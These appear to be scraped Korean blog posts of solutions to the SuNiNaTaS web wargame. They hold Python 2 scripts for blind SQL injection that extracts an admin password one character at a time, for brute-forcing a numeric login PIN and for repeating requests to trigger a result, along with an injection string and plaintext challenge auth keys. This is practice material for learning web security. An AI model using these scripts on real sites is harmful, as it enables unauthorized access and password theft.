import urllib, urllib2, sys

url = ""
#string = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*()_+|\?><"
key = ""

for i in range(1,11):
    for j in range(30,126):
        dat = {'id': "admin' and (substring(pw,"+str(i)+",1)='"+chr(j)+"')-- ", 'pw': '1'}
        dat = urllib.urlencode(dat)
        req = urllib2.Request(url, dat,headers={'Host':'',
                                                'Cookie': 'ASPSESSIONIDQATDBBCA=HEFDDLLDNHPHJJECHJOCLANO'})
        res = urllib2.urlopen(req).read()
        print "i:"+ str(i) + "j:"+str(j)
        if "color=blue>admin" in res:
            print "[*]Find string! : " + chr(j)
            key += chr(j)

print "[+]FIND! : " + key

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS binary09번  (0) 2017.05.22
SuNiNaTaS web23번  (0) 2017.03.10
SuNiNaTaS web08번  (0) 2017.03.07
SuNiNaTaS web07번  (0) 2017.03.07
SuNiNaTaS web06번  (0) 2017.03.07
import urllib, urllib2

url = ""

#User_Agent = "SuNiNaTaS"
i = ""
for i in range(7600,10000):
    dat = {'id': 'admin', 'pw': i}
    dat = urllib.urlencode(dat)
    print dat

    req = urllib2.Request(url, dat, headers=header)
#req.add_header=('User-Agent', User_Agent)

    res = urllib2.urlopen(req).read()
    if "Password Incorrect!" not in res:
        print "[*]Find Auth Key!" + str(i)

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web23번  (0) 2017.03.10
SuNiNaTaS web22번  (0) 2017.03.07
SuNiNaTaS web07번  (0) 2017.03.07
SuNiNaTaS web06번  (0) 2017.03.07
SuNiNaTaS web05번  (0) 2017.03.07
import urllib, urllib2

url = ""
url2 = ""


req = urllib2.Request(url, headers=header)

res = urllib2.urlopen(req).read()
req1 = urllib2.Request(url2, headers=header)
res = urllib2.urlopen(req1).read()
print res

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web22번  (0) 2017.03.07
SuNiNaTaS web08번  (0) 2017.03.07
SuNiNaTaS web06번  (0) 2017.03.07
SuNiNaTaS web05번  (0) 2017.03.07
SuNiNaTaS web04번  (0) 2017.03.07

README 글 비밀번호 쿼리

"select szPwd from T_Web13 where nIdx = '3' and szPwd = '"&pwd&"'"

sqli -> ' or '1' like '1

authkey = suninatastopofworld!

md5(authkey) = 65038b0559e459420aa2d23093d01e4a

쿠키에 입력

Rome's First Emperor를 구글링

auth key = Augustus

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web08번  (0) 2017.03.07
SuNiNaTaS web07번  (0) 2017.03.07
SuNiNaTaS web05번  (0) 2017.03.07
SuNiNaTaS web04번  (0) 2017.03.07
SuNiNaTaS web03번  (0) 2017.03.07

<!--Hint : 12342046413275659 -->

eval 함수 -> alert 변경

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web07번  (0) 2017.03.07
SuNiNaTaS web06번  (0) 2017.03.07
SuNiNaTaS web04번  (0) 2017.03.07
SuNiNaTaS web03번  (0) 2017.03.07
SuNiNaTaS web02번  (0) 2017.03.07
import urllib, urllib2, sys

url = ""
url2 = ""
dat = {'total': '49'}
dat = urllib.urlencode(dat)
for i in range(50):
    req = urllib2.Request(url, dat,headers={'Host':'',
                                        'User-Agent': 'SuNiNaTaS',
                                        'Cookie': 'ASPSESSIONIDCCRBCADD=BBDHFPOCLPILDJPDNCKOAPKN'})
    res = urllib2.urlopen(req).read()
    req = urllib2.Request(url2, dat, headers={'Host':'',
                                        'User-Agent': 'SuNiNaTaS',
                                        'Cookie': 'ASPSESSIONIDCCRBCADD=BBDHFPOCLPILDJPDNCKOAPKN'})
    res = urllib2.urlopen(req).read()
    if ">?????"  not in res:
        print "[*]Find Key : "
        print res

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web06번  (0) 2017.03.07
SuNiNaTaS web05번  (0) 2017.03.07
SuNiNaTaS web03번  (0) 2017.03.07
SuNiNaTaS web02번  (0) 2017.03.07
SuNiNaTaS web01번  (0) 2017.03.07

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